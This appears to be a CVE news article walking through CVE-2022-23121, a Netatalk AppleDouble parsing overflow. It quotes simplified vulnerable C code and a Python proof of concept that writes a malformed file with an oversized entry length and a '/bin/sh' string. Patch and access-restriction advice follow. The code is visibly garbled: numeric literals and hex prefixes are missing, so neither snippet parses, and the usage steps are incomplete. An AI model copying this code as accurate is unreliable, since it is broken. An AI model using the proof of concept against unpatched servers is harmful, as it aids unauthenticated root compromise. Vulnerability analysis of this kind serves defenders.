CVE CyberSecurity Database News

CVE-2022-23121 - Remote Code Execution Vulnerability in Netatalk (ZDI-CAN-15819) – Full Details and Exploit Walkthrough

Poster -

Netatalk is a popular open-source implementation of the Apple Filing Protocol (AFP), letting Unix servers share files with Apple devices. In early 2022, a critical vulnerability was discovered that allows remote, unauthenticated attackers to execute code as root. This long-read will guide you through CVE-2022-23121: explaining the vulnerability, showing code snippets, how it works, and providing references for further reading.

What is the Vulnerability?

CVE-2022-23121 is a remote code execution (RCE) flaw in Netatalk, first disclosed by the Zero Day Initiative (ZDI) as ZDI-CAN-15819.

Attack vector: Malicious AppleDouble-encoded file sent via AFP

At its core, the vulnerability is due to incorrect error handling when parsing AppleDouble entries, letting attackers trigger a buffer overflow and execute arbitrary code.

Root Cause Analysis

Netatalk uses a function called parse_entries to process incoming AppleDouble files (used by Apple clients to store extra metadata). Inside this function, it fails to properly check boundaries and error states.

Below is a simplified chunk from the vulnerable code in adouble.c (source: Netatalk GitHub):

int parse_entries(ADouble *ad, const char *buf, size_t size) {
    // ... (initialization code)
    for (i = ; i < ad->ad_num_entries; i++, ep++) {
        // Parse entry descriptor from buffer
        memcpy(ep, buf + offset, ENTRY_SIZE);
        offset += ENTRY_SIZE;

        // Vulnerable: No check if offset exceeds buffer size
        if (ep->ad_entry_length > ) {
            ep->ad_data = malloc(ep->ad_entry_length);
            memcpy(ep->ad_data, buf + offset, ep->ad_entry_length);
            offset += ep->ad_entry_length;
        }
    }
    // ...
    return ;
}

What's going wrong?
There is no proper boundary check on offset, nor error handling if ad_entry_length is too large. An attacker could craft a file where these offsets/lengths cause memory corruption, leading to arbitrary code execution.

Prerequisites

- Netatalk running and exposing AFP (port 548/tcp)

No authentication required

- Attacker can create or upload files to the AFP share (public share, guest access, or networked write access)

Craft a malicious AppleDouble file

The attacker creates a binary file with manipulated entry descriptors, abusing ad_entry_length for overflow.

Trigger the vulnerable parsing

Once the malicious file is parsed by the server (e.g., accessed by another client or indexed), the exploit code runs as root.

Exploit Example

Here’s a Python proof-of-concept to build a malicious AppleDouble file. (This is educational and should not be run on systems you don't own.)

# Save as exploit_adouble.py
import struct

# Helper to craft a bad AppleDouble file
def make_bad_adouble(filename='exploit.adouble'):
    # AppleDouble header (magic, version, number of entries)
    magic = x00051607
    version = x00020000
    entries = 1

    # Entry descriptor: type, offset, length
    entry_type = 9
    entry_offset = x48   # after entry table
    entry_length = x100  # Larger than actual data

    # AppleDouble file structure
    buf = struct.pack('>I I 16s H',
                      magic, version, b'\x00'*16, entries)
    # Entry table
    buf += struct.pack('>III', entry_type, entry_offset, entry_length)
    # Padding up to offset
    buf += b'\x00' * (entry_offset - len(buf))
    # Malicious data (shellcode, for demonstration: /bin/sh string)
    buf += b'/bin/sh\x00' + b'A' * (entry_length - 8)

    with open(filename, 'wb') as f:
        f.write(buf)

if __name__ == '__main__':
    make_bad_adouble()
    print('Malicious AppleDouble file created: exploit.adouble')

How to use:

Wait for Netatalk to parse it

This is a simple format; real-world exploits will use proper shellcode and amortize offsets/length tricks to control the heap for successful RCE.

Real-World Scenarios

- Open file shares: Public/guest-accessible AFP shares are prime targets

Update Netatalk:

- The official Netatalk 3.1.13 release and later fixes this bug.

Restrict share access:

- Disable guest/public write access wherever possible.

References

- CVE-2022-23121 in NVD
- Zero Day Initiative Advisory (ZDI-22-169): ZDI-CAN-15819
- Netatalk official site & patches
- Netatalk GitHub

Conclusion

CVE-2022-23121 is a prime example of how overlooked boundary checks lead to disastrous security bugs. If you use Netatalk, update immediately and audit your share permissions. Unauthenticated remote code execution as root presents a serious real-world risk!

*Stay safe and keep your systems patched.*

*This post is exclusive and created for technical readers aiming to deeply understand Netatalk CVE-2022-23121. Share responsibly, and use public exploits for educational purposes only!*

Timeline

Published on: 03/28/2023 19:15:00 UTC
Last modified on: 04/03/2023 18:16:00 UTC